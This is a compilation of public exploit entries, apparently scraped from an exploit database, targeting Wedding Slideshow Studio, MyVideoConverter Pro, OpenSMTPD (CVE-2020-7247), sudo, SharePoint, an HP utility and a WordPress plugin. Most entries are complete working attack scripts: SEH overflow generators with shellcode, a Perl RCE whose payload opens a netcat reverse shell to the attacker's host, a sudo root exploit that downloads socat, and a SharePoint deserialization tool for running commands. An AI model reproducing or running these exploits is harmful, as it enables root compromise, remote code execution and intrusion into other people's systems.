ISHACK AI BOT

#Exploit Title: Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-10 #Vendor Homepage : http://www.wedding-slideshow-studio.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "name.txt". #2. Just copy the text inside "name.txt". #3. Start the program. In the new window click "Help" > "Register ... #4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok" #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 256 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x100411fc) #0x100411fc : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [DVDPhotoData.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll) long_buffer = "\x44" * 600 shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode + long_buffer try: f=open("name.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation # Date: 2020-02-02 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.opensmtpd.org/ # Version: OpenSMTPD 6.4.0 - 6.6.1 # Tested on: OpenBSD 6.6, Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 # CVE: CVE-2020-7247 #!/usr/bin/perl # # raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD # Copyright (c) 2020 Marco Ivaldi <[email protected]> # # smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and # other products, allows remote attackers to execute arbitrary commands as root # via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL # FROM field. This affects the "uncommented" default configuration. The issue # exists because of an incorrect return value upon failure of input validation # (CVE-2020-7247). # # "Wow. I feel all butterflies in my tummy that bugs like this still exist. # That's awesome :)" -- skyper # # This exploit targets OpenBSD's OpenSMTPD in order to escalate privileges to # root on OpenBSD in the default configuration, or execute remote commands as # root (only in OpenSMTPD "uncommented" default configuration). # # See also: # https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt # https://poolp.org/posts/2020-01-30/opensmtpd-advisory-dissected/ # https://www.kb.cert.org/vuls/id/390745/ # https://www.opensmtpd.org/security.html # # Usage (LPE): # phish$ uname -a # OpenBSD phish.fnord.st 6.6 GENERIC#353 amd64 # phish$ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor), 0(wheel) # phish$ ./raptor_opensmtpd.pl LPE # [...] # Payload sent, please wait 5 seconds... # -rwsrwxrwx 1 root wheel 12432 Feb 1 21:20 /usr/local/bin/pwned # phish# id # uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel) # # Usage (RCE): # raptor@eris ~ % ./raptor_opensmtpd.pl RCE 10.0.0.162 10.0.0.24 example.org # [...] # Payload sent, please wait 5 seconds... # /bin/sh: No controlling tty (open /dev/tty: Device not configured) # /bin/sh: Can't find tty file descriptor # /bin/sh: warning: won't have full job control # phish# id # uid=0(root) gid=0(wheel) groups=0(wheel) # # Vulnerable platforms (OpenSMTPD 6.4.0 - 6.6.1): # OpenBSD 6.6 [tested] # OpenBSD 6.5 [untested] # OpenBSD 6.4 [untested] # Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 [tested] # Other Linux distributions [untested] # FreeBSD [untested] # NetBSD [untested] # use IO::Socket::INET; print "raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD\n"; print "Copyright (c) 2020 Marco Ivaldi <raptor\@0xdeadbeef.info>\n\n"; $usage = "Usage:\n". "$0 LPE\n". "$0 RCE <remote_host> <local_host> [<domain>]\n"; $lport = 4444; ($type, $rhost, $lhost, $domain) = @ARGV; die $usage if (($type ne "LPE") && ($type ne "RCE")); # Prepare the payload if ($type eq "LPE") { # LPE $payload = "cp /bin/sh /usr/local/bin/pwned\n". "echo 'main(){setuid(0);setgid(0);system(\"/bin/sh\");}' > /tmp/pwned.c\n". "gcc /tmp/pwned.c -o /usr/local/bin/pwned\nchmod 4777 /usr/local/bin/pwned"; $rhost = "127.0.0.1"; } else { # RCE die $usage if ((not defined $rhost) || (not defined $lhost)); $payload = "sleep 5;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|". "nc $lhost $lport >/tmp/f"; } # Open SMTP connection $| = 1; $s = IO::Socket::INET->new("$rhost:25") or die "Error: $@\n"; # Read SMTP banner $r = <$s>; print "< $r"; die "Error: this is not OpenSMTPD\n" if ($r !~ /OpenSMTPD/); # Send HELO $w = "HELO fnord"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send evil MAIL FROM $w = "MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send RCPT TO if (not defined $domain) { $rcpt = "<root>"; } else { $rcpt = "<root\@$domain>"; } $w = "RCPT TO:$rcpt"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send payload in DATA $w = "DATA"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; $w = "\n#0\n#1\n#2\n#3\n#4\n#5\n#6\n#7\n#8\n#9\n#a\n#b\n#c\n#d\n$payload\n."; #print "> $w\n"; # uncomment for debugging print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Close SMTP connection $s->close(); print "\nPayload sent, please wait 5 seconds...\n"; # Got root? if ($type eq "LPE") { # LPE sleep 5; print `ls -l /usr/local/bin/pwned`; exec "/usr/local/bin/pwned" or die "Error: exploit failed :(\n"; } else { # RCE exec "nc -vl $lport" or die "Error: unable to execute netcat\n"; # BSD netcat #exec "nc -vlp $lport" or die "Error: unable to execute netcat\n"; # Debian netcat }

#!/bin/bash # We will need socat to run this. if [ ! -f socat ]; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat chmod +x socat fi cat <<EOF > xpl.pl \$buf_sz = 256; \$askpass_sz = 32; \$signo_sz = 4*65; \$tgetpass_flag = "\x04\x00\x00\x00" . ("\x00"x24); print("\x00\x15"x(\$buf_sz+\$askpass_sz) . ("\x00\x15"x\$signo_sz) . (\$tgetpass_flag) . "\x37\x98\x01\x00\x35\x98\x01\x00\x35\x98\x01\x00\xff\xff\xff\xff\x35\x98\x01\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x15"x104 . "\n"); EOF cat <<EOF > exec.c #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/stat.h> #include <stdlib.h> #include <unistd.h> int main(void) { printf("Exploiting!\n"); int fd = open("/proc/self/exe", O_RDONLY); struct stat st; fstat(fd, &st); if (st.st_uid != 0) { fchown(fd, 0, st.st_gid); fchmod(fd, S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP); } else { setuid(0); execve("/bin/bash",NULL,NULL); } return 0; } EOF cc -w exec.c -o /tmp/pipe ./socat pty,link=/tmp/pty,waitslave exec:"perl xpl.pl"& sleep 0.5 export SUDO_ASKPASS=/tmp/pipe sudo -k -S id < /tmp/pty /tmp/pipe

#!/usr/bin/env python3 # -*- coding: utf-8 -*- import requests import sys from xml.sax.saxutils import escape from lxml import html import codecs import readline from clint.arguments import Args import signal def serialize_command(cmd): total = "" for x in cmd: a = codecs.encode(x,"utf-16be") b = codecs.encode(a,"hex").decode('ascii') total += b[::-1] return total def deserialize_command(cmd): length = len(cmd) s = "" for i in range(0,length,4): character = cmd[i]+cmd[i+1]+cmd[i+2]+cmd[i+3] character = character[::-1] c_hex = codecs.decode(character,"hex") a = codecs.decode(c_hex,"utf-16be") s += a return s ####################################### signal.signal(signal.SIGINT, signal.default_int_handler) args = Args() myargs = dict(args.grouped) if '--help' in myargs or '-h' in myargs: help = """ desharialize options: -h --help - This menu -u --url - The Sharepoint Picker.aspx URL ( e.g. http://localhost/_layouts/15/Picker.aspx ) -c --command - The command to run on the target Sharepoint server. -f --file - The file containing the command to run (Useful for commands with multi-lines or characters that need escaping) """ print (help) exit(0) url = '' cmd = '' filename = '' if '--url' in myargs or '-u' in myargs: try: url = myargs['--url'][0] except: url = myargs['-u'][0] if '--command' in myargs or '-c' in myargs: if '--file' in myargs or '-f' in myargs: print("Can't use both command and file options at the same time!") exit(0) try: cmd = myargs['--command'][0] except: cmd = myargs['-c'][0] if '--file' in myargs or '-f' in myargs: try: filename = myargs['--file'][0] except: filename = myargs['-f'][0] file = open(filename,mode='r') cmd = file.read() file.close() sharepoint2019and2016 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=16.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"; sharepoint2013 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"; sharepoint2010 = "?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=14.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c"; PY2 = sys.version_info[0] == 2 PY3 = sys.version_info[0] == 3 if PY3: string_types = str, raw_input = input else: string_types = basestring, if url == '': url = raw_input("Enter the SharePoint Server URL ending with Picker.aspx:") headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0', } firstcall = requests.get(url,headers=headers) spheader = firstcall.headers.get('MicrosoftSharePointTeamServices','16') spheader = int(spheader.split('.')[0]) payload = "__bpzzzz35009700370047005600d600e2004400160047001600e20035005600270067009600360056003700e2009400e600470056002700e6001600c600e2005400870007001600e600460056004600750027001600070007005600270006002300b500b50035009700370047005600d600e20075009600e6004600f60077003700e200d40016002700b60057000700e20085001600d600c600250056001600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500c200b50035009700370047005600d600e20075009600e6004600f60077003700e2004400160047001600e200f4002600a600560036004700440016004700160005002700f60067009600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c200020035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c300f3008700d600c600020067005600270037009600f600e600d30022001300e2000300220002005600e6003600f60046009600e6007600d3002200570047006600d200130063002200f300e300d000a000c3005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700d600c600e6003700a300870037009600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d6001600d2009600e600370047001600e60036005600220002008700d600c600e6003700a300870037004600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d60016002200e300d000a00002000200c30005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a0000200020002000200c300f4002600a6005600360047009400e600370047001600e600360056000200870037009600a3004700970007005600d300220085001600d600c60025005600160046005600270022000200f200e300d000a0000200020002000200c300d400560047008600f6004600e4001600d6005600e30005001600270037005600c300f200d400560047008600f6004600e4001600d6005600e300d000a0000200020002000200c300d400560047008600f60046000500160027001600d60056004700560027003700e300d000a000020002000200020002000200c3001600e600970045009700070056000200870037009600a3004700970007005600d3002200870037004600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e60016002700970002008700d600c600e6003700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e600720002008700d600c600e6003700a3008700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600720002008700d600c600e6003700a30035009700370047005600d600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600b3001600370037005600d6002600c6009700d300d60037003600f6002700c60096002600720002008700d600c600e6003700a3004400960016007600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600e2004400960016007600e600f60037004700960036003700b3001600370037005600d6002600c6009700d30037009700370047005600d6007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700a300b40056009700d3007200970072000200f4002600a6005600360047004500970007005600d3007200b7008700a300450097000700560002004400960016007600a30005002700f6003600560037003700d70072000200d400560047008600f6004600e4001600d6005600d3007200350047001600270047007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b3003600d60046006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b300f20036000200e200e200e200140024003400e200e200e20002006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b3006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b3006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b3000200c300f2001600e60097004500970007005600e300d000a0000200020002000200c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300d000a00002000200c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a000c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300" assemblyvalue = sharepoint2019and2016 if spheader == 15: assemblyvalue = sharepoint2013 elif spheader == 14: assemblyvalue = sharepoint2010 else: assemblyvalue = sharepoint2019and2016 FullURL = url + assemblyvalue secondcall = requests.get(FullURL,headers=headers) secondcalltext = secondcall.text tree = html.fromstring(secondcall.content) viewstate = '' eventvalidation = '' try: viewstate = tree.get_element_by_id('__VIEWSTATE') viewstate = viewstate.value except: pass try: eventvalidation = tree.get_element_by_id('__EVENTVALIDATION') eventvalidation = eventvalidation.value except: pass if cmd == '': cmd = raw_input("Write your full command here to execute on the test target system (Make sure you have permissions from system owner):") #escapedcmd = escape(cmd,html_escape_table) cmd = cmd.replace("&","&") cmd = cmd.replace(">",">") cmd = cmd.replace("<","<") cmd = cmd.replace("\"",""") cmd = cmd.replace("'","&apos;") escapedcmd = escape(cmd) print(escapedcmd) srlcmd = serialize_command(escapedcmd) length = 1448 + len(escapedcmd) hex_length = format(length * 4,'x') serialized_length = hex_length[::-1] payload = payload.replace("e200e200e200140024003400e200e200e200",srlcmd) payload = payload.replace("zzzz",serialized_length) print("Deserialized Payload:") print(deserialize_command(payload[8:])) data = {"__VIEWSTATE":viewstate,"__EVENTVALIDATION":eventvalidation,"ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData":payload} thirdcall = requests.post(FullURL, data=data,headers=headers) print("Payload launched! Check execution results. Exiting...")

#Exploit Title: MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-11 #Vendor Homepage : http://www.ivideogo.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "Shell.txt". #2. Just copy the text inside "Shell.txt". #3. Start the program. In the new window click "Add" > "Convert DVD" > "Movie" . #4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..." #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 268 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x1004f3e3) #0x1004f3e3 : pop ebx # pop esi # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("Shell.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

#Exploit Title: MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-11 #Vendor Homepage : http://www.ivideogo.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "exploit.txt". #2. Just copy the text inside "exploit.txt". #3. Start the program. In the new window click "Options" > "Settins" . #4. Now paste the content of "exploit.txt" into the field: "Output Folder" > Click "..." #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 268 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x10045ebb) #0x10045ebb : pop edi # pop ebx # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("exploit.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: HP System Event Utility - Local Privilege Escalation # Author: hyp3rlinx # Date: 2020-02-11 # Vendor: www.hp.com # Link: https://hp-system-event-utility.en.lo4d.com/download # CVE: CVE-2019-18915 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.hp.com [Product] HP System Event Utility The genuine HPMSGSVC.exe file is a software component of HP System Event Utility by HP Inc. HP System Event Utility enables the functioning of special function keys on select HP devices. [Vulnerability Type] Local Privilege Escalation [CVE Reference] CVE-2019-18915 [Security Issue] The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. HPMSGSVC.exe runs a background process that delivers push notifications. The problem is that HP Message Service will load and execute any arbitrary executable named "Program.exe" if found in the users c:\ drive. Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe Two Handles are inherit, properties are Write/Read Name: \Device\ConDrv This results in arbitrary code execution persistence mechanism if an attacker can place an EXE in this location and can be used to escalate privileges from Admin to SYSTEM. HP has/is released/releasing a mitigation: https://support.hp.com/us-en/document/c06559359 [References] PSR-2019-0204 https://support.hp.com/us-en/document/c06559359 [Network Access] Local [Disclosure Timeline] Vendor Notification: October 7, 2019 HP PSRT "product team will address the issue in next release" : January 13, 2020 HP advisory and mitigation release : February 10, 2020 February 11, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow # Exploit Author : ZwX # Exploit Date: 2020-02-11 # Vendor Homepage : http://www.ivideogo.com/ # Tested on OS: Windows 10 v1803 # Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "Shell.txt". #2. Just copy the text inside "Shell.txt". #3. Start the program. In the new window click "Add" > "Convert DVD" > "TVSeries" . #4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..." #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 268 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x10039291) #0x10039291 : pop ecx # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [mysubtitle.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("Shell.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion # Author: mehran feizi # Category: webapps # Date: 2020-02-12 # vendor home page: https://wordpress.org/plugins/tutor/ =================================================================== Vulnerable page: /instructors.php =================================================================== Vulnerable Source: 3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 7: include include $include_file; requires: 4: if(!empty($sub_page)) 6: if(file_exists($include_file)) =================================================================== Exploit: localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] ================================================================================= contact me: telegram: @MF0584 gmail: [email protected] =================================================================== Vulnerable page: /instructors.php =================================================================== Vulnerable Source: 3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 7: include include $include_file; requires: 4: if(!empty($sub_page)) 6: if(file_exists($include_file)) =================================================================== Exploit: localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] =================================================================================

